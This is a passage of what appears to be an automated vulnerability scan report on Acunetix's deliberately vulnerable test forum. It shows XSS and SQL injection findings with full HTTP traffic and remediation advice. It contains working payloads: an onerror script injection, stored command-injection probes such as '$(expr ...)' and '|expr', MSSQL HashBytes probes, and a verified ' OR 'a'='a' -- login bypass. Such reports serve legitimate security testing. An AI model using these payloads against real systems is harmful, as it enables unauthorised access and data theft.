     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary13. Stored/Reflected XSS via image 'onerror' handler in forum post
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 13:42:42
URL
http://testasp.vulnweb.com/showthread.asp?id=4
Detail
The response for showthread (id=4) renders a forum post avatar image whose src attribute contains an unescaped payload: <img src='avatars/x onerror=alert(1)'>. The 'x onerror=alert(1)' string was stored/echoed into the HTML without encoding, so the onerror handler fires and executes attacker-controlled JavaScript in the browser of anyone viewing the thread.
AI Confidence
90%
Evidence
<img src='avatars/x onerror=alert(1)'>
HTTP Request
Full request
GET /showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MLGLGGOBMFPLKOJPNIDIGGMJ; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:40:03 GMT
Connection: close
Content-Length: 3122


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum
Email Injection Test
</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<div class="path">
			<a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Email Injection Test
		</div>
      <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5">
        <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/x onerror=alert(1)'><br>posted by <b>email_inj_2</b> on 7/19/2026 5:11:03 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Email Injection Test - 82.212.187.128</div><div class='posttext'>testing</div></td></tr>
      </table>
      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary14. Stored/persistent XSS via unencoded forum post content
Severity: High  |  Confidence: Tentative  |  CWE: CWE-79 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 13:38:14
URL
http://testasp.vulnweb.com/showthread.asp?id=0
Detail
User-submitted forum post titles and bodies are rendered back into the HTML response without evidence of output encoding; injected payloads such as ${@var_dump(md5(632164370))}; and ${897036459+915228567} appear verbatim inside <div class='posttext'> elements. Because arbitrary post content is stored and re-served to every viewer, a script payload in a post would execute in other users' browsers (stored XSS).
AI Confidence
63%
Evidence
<div class='posttext'>${@var_dump(md5(632164370))};</div> ... <div class='posttext'>${897036459+915228567}</div>
HTTP Request
Full request
GET /showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=HOOKGGOBINEBOOLILKCMHAPI; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:35:48 GMT
Connection: close
Content-Length: 6930


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum
1
</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<div class="path">
			<a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1
		</div>
      <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5">
        <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:53 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>${@var_dump(md5(632164370))};</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:53 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>${897036459+915228567}</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:53 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>'-var_dump(md5(444378644))-'</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:53 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>
expr 988495397 + 920777514
</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:53 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>|expr 995948582 + 911497021 </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:54 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>$(expr 932997997 + 987510369)</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:54 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>&set /A 934369053+824195791</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:54 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1019374028')))</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1182340807')))>'0</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>expr 937742823 + 998978723</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>鎈'"\(</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>crawlergo@gmail.com</b> on 7/19/2026 5:27:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Crawlergo - 66.179.30.133</div><div class='posttext'>'"\(</div></td></tr>
      </table>
      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.

High CWE-89 - SQL Injection 12 findings

↩ Glossary15. Possible SQL injection in 'id' parameter
Severity: High  |  Confidence: Tentative  |  CWE: CWE-89 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 11:36:05
URL
http://testasp.vulnweb.com/showforum.asp?id=0
Detail
The 'id' URL parameter (observed value '0' on /showforum.asp?id=0) is an integer identifier that drives a per-thread database lookup, as shown by the response listing threads linked as '?id=0', '?id=1', '?id=2', etc. Classic-ASP forum applications of this type commonly interpolate such an identifier directly into a SQL statement, and no server-side type enforcement or sanitisation is evident from the traffic. The value is reflected into generated links but no injection payload was submitted, so this is a strong structural candidate rather than a proven injection.
AI Confidence
66%
Evidence
url: http://testasp.vulnweb.com/showforum.asp?id=0 ; response links: <a href='showthread.asp?id=0'>1</a> ... ?id=1 ... ?id=2 ... ?id=3 ... ?id=4
HTTP Request
Full request
GET /showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Default.asp
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:32:29 GMT
Content-Length: 3788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum Acunetix Web Vulnerability Scanner</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<div class="path">
			Acunetix Web Vulnerability Scanner
		</div>
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Thread</td>
        <td class="tableheader">Posts</td>
		<td class="tableheader">Posted by</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:25 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>2</a></div></td><td>2</td><td>admin</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>3</a></div></td><td>2</td><td>admin</td><td>11/9/2005 1:08:52 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>aaa</a></div></td><td>1</td><td>admin</td><td>11/9/2005 1:45:54 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>Спилы Деревьев
</a></div></td><td>1</td><td>Charlesitaxy</td><td>7/19/2026 3:22:51 PM</td></tr>
	</table>
	
	<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary16. SQL Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-89 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 14:19:30
URL
http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Vulnerable Parameter
tfUName
Detail
Boolean-based blind SQLi: TRUE branch within 0.0% of baseline (140B, status 302), FALSE branch diverges 2158.6% (3162B, status 200)
Payload
' OR 'a'='a' -- 
Detection Heuristic
Boolean-based blind SQLi: TRUE branch within 0.0% of baseline (140B, status 302), FALSE branch diverges 2158.6% (3162B, status 200)
AI Confidence
95%
HTTP Request
Full request
POST /Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Content-Length: 59
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://testasp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

tfUName=' OR 'a'='a' -- &tfUPass=admin%27+or+%271%27%3D%271
HTTP Response
Full response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Location: /showforum.asp?id=2
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:19:28 GMT
Content-Length: 140

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary17. SQL Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-89 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 14:14:25
URL
